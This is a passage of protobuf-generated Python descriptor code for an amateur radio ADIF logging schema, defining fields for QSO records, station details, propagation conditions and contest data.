name='logging_station', full_name='adif.Qso.logging_station', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contacted_station', full_name='adif.Qso.contacted_station', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='propagation', full_name='adif.Qso.propagation', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='band', full_name='adif.Qso.band', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='band_rx', full_name='adif.Qso.band_rx', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='freq', full_name='adif.Qso.freq', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='freq_rx', full_name='adif.Qso.freq_rx', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mode', full_name='adif.Qso.mode', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='submode', full_name='adif.Qso.submode', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='distance_km', full_name='adif.Qso.distance_km', index=9,
number=10, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='time_on', full_name='adif.Qso.time_on', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='time_off', full_name='adif.Qso.time_off', index=11,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='random', full_name='adif.Qso.random', index=12,
number=13, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rst_received', full_name='adif.Qso.rst_received', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rst_sent', full_name='adif.Qso.rst_sent', index=14,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='swl', full_name='adif.Qso.swl', index=15,
number=16, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='complete', full_name='adif.Qso.complete', index=16,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='comment', full_name='adif.Qso.comment', index=17,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='notes', full_name='adif.Qso.notes', index=18,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contest', full_name='adif.Qso.contest', index=19,
number=20, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='award_submitted', full_name='adif.Qso.award_submitted', index=20,
number=21, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='award_granted', full_name='adif.Qso.award_granted', index=21,
number=22, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='credit_submitted', full_name='adif.Qso.credit_submitted', index=22,
number=23, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='credit_granted', full_name='adif.Qso.credit_granted', index=23,
number=24, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='public_key', full_name='adif.Qso.public_key', index=24,
number=25, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='clublog', full_name='adif.Qso.clublog', index=25,
number=26, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='hrdlog', full_name='adif.Qso.hrdlog', index=26,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qrzcom', full_name='adif.Qso.qrzcom', index=27,
number=28, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='eqsl', full_name='adif.Qso.eqsl', index=28,
number=29, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lotw', full_name='adif.Qso.lotw', index=29,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='card', full_name='adif.Qso.card', index=30,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='app_defined', full_name='adif.Qso.app_defined', index=31,
number=32, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_QSO_APPDEFINEDENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=250,
serialized_end=1148,
)
_STATION = _descriptor.Descriptor(
name='Station',
full_name='adif.Station',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='op_call', full_name='adif.Station.op_call', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='op_name', full_name='adif.Station.op_name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='grid_square', full_name='adif.Station.grid_square', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='latitude', full_name='adif.Station.latitude', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='longitude', full_name='adif.Station.longitude', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='power', full_name='adif.Station.power', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rig', full_name='adif.Station.rig', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='antenna', full_name='adif.Station.antenna', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='antenna_azimuth', full_name='adif.Station.antenna_azimuth', index=8,
number=9, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='antenna_elevation', full_name='adif.Station.antenna_elevation', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='owner_call', full_name='adif.Station.owner_call', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='station_call', full_name='adif.Station.station_call', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='age', full_name='adif.Station.age', index=12,
number=13, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='silent_key', full_name='adif.Station.silent_key', index=13,
number=14, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qsl_via', full_name='adif.Station.qsl_via', index=14,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='address', full_name='adif.Station.address', index=15,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='street', full_name='adif.Station.street', index=16,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='city', full_name='adif.Station.city', index=17,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='postal_code', full_name='adif.Station.postal_code', index=18,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='county', full_name='adif.Station.county', index=19,
number=20, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state', full_name='adif.Station.state', index=20,
number=21, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='country', full_name='adif.Station.country', index=21,
number=22, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dxcc', full_name='adif.Station.dxcc', index=22,
number=23, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='continent', full_name='adif.Station.continent', index=23,
number=24, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='email', full_name='adif.Station.email', index=24,
number=25, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='web', full_name='adif.Station.web', index=25,
number=26, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cq_zone', full_name='adif.Station.cq_zone', index=26,
number=27, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='itu_zone', full_name='adif.Station.itu_zone', index=27,
number=28, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='darc_dok', full_name='adif.Station.darc_dok', index=28,
number=29, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='fists', full_name='adif.Station.fists', index=29,
number=30, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='fists_cc', full_name='adif.Station.fists_cc', index=30,
number=31, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='iota', full_name='adif.Station.iota', index=31,
number=32, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='iota_island_id', full_name='adif.Station.iota_island_id', index=32,
number=33, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pfx', full_name='adif.Station.pfx', index=33,
number=34, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='region', full_name='adif.Station.region', index=34,
number=35, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='skcc', full_name='adif.Station.skcc', index=35,
number=36, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sig', full_name='adif.Station.sig', index=36,
number=37, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sig_info', full_name='adif.Station.sig_info', index=37,
number=38, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sota_ref', full_name='adif.Station.sota_ref', index=38,
number=39, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ten_ten', full_name='adif.Station.ten_ten', index=39,
number=40, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='usaca_counties', full_name='adif.Station.usaca_counties', index=40,
number=41, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='uksmg', full_name='adif.Station.uksmg', index=41,
number=42, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vucc_grids', full_name='adif.Station.vucc_grids', index=42,
number=43, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1151,
serialized_end=1910,
)
_PROPAGATION = _descriptor.Descriptor(
name='Propagation',
full_name='adif.Propagation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='propagation_mode', full_name='adif.Propagation.propagation_mode', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='a_index', full_name='adif.Propagation.a_index', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='k_index', full_name='adif.Propagation.k_index', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='solar_flux_index', full_name='adif.Propagation.solar_flux_index', index=3,
number=4, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ant_path', full_name='adif.Propagation.ant_path', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='force_init', full_name='adif.Propagation.force_init', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_bursts', full_name='adif.Propagation.max_bursts', index=6,
number=7, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='meteor_shower_name', full_name='adif.Propagation.meteor_shower_name', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='nr_bursts', full_name='adif.Propagation.nr_bursts', index=8,
number=11, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='nr_pings', full_name='adif.Propagation.nr_pings', index=9,
number=12, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sat_mode', full_name='adif.Propagation.sat_mode', index=10,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sat_name', full_name='adif.Propagation.sat_name', index=11,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1913,
serialized_end=2171,
)
_CONTESTDATA = _descriptor.Descriptor(
name='ContestData',
full_name='adif.ContestData',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='contest_id', full_name='adif.ContestData.contest_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='serial_sent', full_name='adif.ContestData.serial_sent', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='serial_received', full_name='adif.ContestData.serial_received', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='arrl_section', full_name='adif.ContestData.arrl_section', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
